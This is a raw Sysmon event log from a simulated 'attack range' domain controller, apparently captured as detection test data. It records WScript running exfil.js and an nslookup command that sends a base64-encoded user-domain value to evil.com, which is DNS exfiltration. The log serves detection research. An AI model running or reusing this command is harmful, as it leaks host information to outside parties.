14:21:41.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51028- 354300x8000000000000000212742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.199{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51028-false127.0.0.1-53domain 354300x8000000000000000212741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.199{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51027-false127.0.0.1-53domain 354300x8000000000000000212740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51027- 354300x8000000000000000212739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.199{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51027-false127.0.0.1-53domain 354300x8000000000000000212738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.198{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51026-false127.0.0.1-53domain 354300x8000000000000000212737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.198{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51026- 354300x8000000000000000212736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.198{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51026-false127.0.0.1-53domain 354300x8000000000000000212735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51025-false127.0.0.1-53domain 354300x8000000000000000212734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51025- 354300x8000000000000000212733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51025-false127.0.0.1-53domain 354300x8000000000000000212732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51024-false127.0.0.1-53domain 23542300x8000000000000000212731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluihemqi.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000212730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51024- 354300x8000000000000000212729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.142{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51024-false127.0.0.1-53domain 354300x8000000000000000212728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.141{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51023-false127.0.0.1-53domain 354300x8000000000000000212727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.141{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51023- 354300x8000000000000000212726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.141{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51023-false127.0.0.1-53domain 10341000x8000000000000000212725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.723{2E1864BB-18F6-629A-2C45-000000005F02}31685924C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2D45-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2D45-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.708{2E1864BB-18F6-629A-2B45-000000005F02}23887300C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-2D45-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.717{2E1864BB-18F6-629A-2D45-000000005F02}5000C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-2B45-000000005F02}2388C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluihemqi.tmp 2>&1 10341000x8000000000000000212717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.692{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2C45-000000005F02}3168C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.692{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2C45-000000005F02}3168C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.670{2E1864BB-18F6-629A-2C45-000000005F02}31685924C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2B45-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.654{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2C45-000000005F02}3168C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2B45-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-18E0-629A-6742-000000005F02}39767712C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-2B45-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.652{2E1864BB-18F6-629A-2B45-000000005F02}2388C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluihemqi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.639{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnzbuc.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-18F6-629A-2945-000000005F02}45727000C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2A45-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 